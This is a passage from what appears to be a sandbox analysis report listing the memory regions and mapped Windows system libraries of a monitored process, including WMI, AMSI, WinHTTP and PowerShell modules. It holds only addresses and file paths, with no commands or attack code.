"\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1217 start_va = 0x1ada0000 end_va = 0x1ae9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ada0000" filename = "" Region: id = 1218 start_va = 0x1aea0000 end_va = 0x1af9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aea0000" filename = "" Region: id = 1219 start_va = 0x7fffb4d40000 end_va = 0x7fffb4d50fff monitored = 0 entry_point = 0x7fffb4d42aa0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1220 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1221 start_va = 0x7fffad180000 end_va = 0x7fffad1affff monitored = 1 entry_point = 0x7fffad186930 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\wminet_utils.dll") Region: id = 1222 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1223 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1225 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1226 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1227 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1228 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1229 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1230 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1231 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1232 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1233 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1234 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1235 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1236 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1237 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1238 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1239 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1240 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1241 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1242 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1243 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1244 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1245 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1246 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1247 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1248 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1249 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1250 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1251 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1252 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1253 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1254 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1255 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1256 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1257 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1258 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1259 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1260 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1261 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1262 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1263 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1264 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1265 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1266 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1267 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1268 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1269 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1270 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1271 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1272 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1273 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1274 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1275 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1276 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1277 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1278 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1279 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1280 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1281 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1881 start_va = 0x7fffb4780000 end_va = 0x7fffb4793fff monitored = 0 entry_point = 0x7fffb4781800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1882 start_va = 0x7fffb4820000 end_va = 0x7fffb492afff monitored = 0 entry_point = 0x7fffb4855c10 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1883 start_va = 0x7fffb4460000 end_va = 0x7fffb4476fff monitored = 0 entry_point = 0x7fffb44681c0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 1884 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1885 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1886 start_va = 0x7fffb4410000 end_va = 0x7fffb4453fff monitored = 0 entry_point = 0x7fffb442f4d0 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 1887 start_va = 0x1aea0000 end_va = 0x1af9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aea0000" filename = "" Region: id = 2049 start_va = 0x690000 end_va = 0x692fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2050 start_va = 0x1afa0000 end_va = 0x1b09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001afa0000" filename = "" Region: id = 2162 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2163 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2164 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2165 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2166 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2167 start_va = 0x1b0a0000 end_va = 0x1b19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b0a0000" filename = "" Region: id = 2184 start_va = 0x690000 end_va = 0x692fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2190 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2192 start_va = 0x690000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2194 start_va = 0x7fffa83a0000 end_va = 0x7fffa84d2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\9e05584a25afa1da195dc4959a902595\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\9e05584a25afa1da195dc4959a902595\\system.configuration.ni.dll") Region: id = 2198 start_va = 0x7fffa35d0000 end_va = 0x7fffa3e7afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\238862161c05eb67325815002be6719c\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\238862161c05eb67325815002be6719c\\system.xml.ni.dll") Region: id = 2201 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2202 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2203 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 2204 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2205 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 2207 start_va = 0x7fffa8da0000 end_va = 0x7fffa8e93fff monitored = 0 entry_point = 0x7fffa8db0910 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 2208 start_va = 0x7fffabbb0000 end_va = 0x7fffabbe3fff monitored = 0 entry_point = 0x7fffabbb13d0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 2209 start_va = 0x7fffbda90000 end_va = 0x7fffbdaa4fff monitored = 0 entry_point = 0x7fffbda92f90 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2210 start_va = 0x7fffc98a0000 end_va = 0x7fffc9909fff monitored = 0 entry_point = 0x7fffc98b0e90 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2211 start_va = 0x1b0a0000 end_va = 0x1b1defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2212 start_va = 0x1b1e0000 end_va = 0x1b2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b1e0000" filename = "" Region: id = 2213 start_va = 0x1b2e0000 end_va = 0x1b3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b2e0000" filename = "" Region: id = 2214 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2215 start_va = 0x7fffb1720000 end_va = 0x7fffb1736fff monitored = 0 entry_point = 0x7fffb1722210 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2216 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2217 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2218 start_va = 0x7fffc07b0000 end_va = 0x7fffc07c6fff monitored = 0 entry_point = 0x7fffc07b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2219 start_va = 0x7fffc06c0000 end_va = 0x7fffc06dcfff monitored = 0 entry_point = 0x7fffc06c29b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2220 start_va = 0x1b3e0000 end_va = 0x1b4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b3e0000" filename = "" Region: id = 2221 start_va = 0x6c0000 end_va = 0x6c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2222 start_va = 0x6d0000 end_va = 0x6dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2223 start_va = 0x6c0000 end_va = 0x6c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2224 start_va = 0x6d0000 end_va = 0x6dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2225 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2226 start_va = 0x6c0000 end_va = 0x6cafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2227 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2228 start_va = 0x6c0000 end_va = 0x6cafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2229 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2230 start_va = 0x6c0000 end_va = 0x6cafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2231 start_va = 0x7fffc95e0000 end_va = 0x7fffc96a9fff monitored = 0 entry_point = 0x7fffc960bc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2232 start_va = 0x7fffc17b0000 end_va = 0x7fffc17bafff monitored = 0 entry_point = 0x7fffc17b1f70 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2233 start_va = 0x7fffbfbd0000 end_va = 0x7fffbfbd9fff monitored = 0 entry_point = 0x7fffbfbd14a0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2235 start_va = 0x7fffbfaf0000 end_va = 0x7fffbfb6efff monitored = 0 entry_point = 0x7fffbfaf5910 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2236 start_va = 0x7fff48050000 end_va = 0x7fff4805ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48050000" filename = "" Region: id = 2239 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2240 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2243 start_va = 0x7fffc65e0000 end_va = 0x7fffc66d4fff monitored = 0 entry_point = 0x7fffc6622860 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2252 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2253 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2254 start_va = 0x2110000 end_va = 0x2158fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db") Region: id = 2255 start_va = 0x6d0000 end_va = 0x6d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2256 start_va = 0x1b4e0000 end_va = 0x1b57bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2257 start_va = 0x6e0000 end_va = 0x6effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 2258 start_va = 0x1b580000 end_va = 0x1b67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b580000" filename = "" Region: id = 2259 start_va = 0x6f0000 end_va = 0x6f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2260 start_va = 0x720000 end_va = 0x733fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000006.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000006.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000006.db") Region: id = 2261 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2262 start_va = 0x7fffb6ac0000 end_va = 0x7fffb6ae3fff monitored = 0 entry_point = 0x7fffb6ac1790 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 2263 start_va = 0x1b680000 end_va = 0x1b77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b680000" filename = "" Region: id = 2264 start_va = 0x700000 end_va = 0x701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 2265 start_va = 0x7fffbd920000 end_va = 0x7fffbda65fff monitored = 0 entry_point = 0x7fffbd927620 region_type = mapped_file name = "windows.staterepositoryps.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryPS.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryps.dll") Region: id = 2266 start_va = 0x7fffc15c0000 end_va = 0x7fffc17acfff monitored = 0 entry_point = 0x7fffc163ea20 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 2267 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2268 start_va = 0x740000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2270 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2271 start_va = 0x750000 end_va = 0x752fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 2272 start_va = 0x1b780000 end_va = 0x1b7f0fff monitored = 0 entry_point = 0x1b783d40 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 2273 start_va = 0x750000 end_va = 0x752fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 2274 start_va = 0x1b780000 end_va = 0x1b7f0fff monitored = 0 entry_point = 0x1b783d40 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 2275 start_va = 0x7fffb9f90000 end_va = 0x7fffba01ffff monitored = 0 entry_point = 0x7fffb9ff2720 region_type = mapped_file name = "appresolver.dll" filename = "\\Windows\\System32\\AppResolver.dll" (normalized: 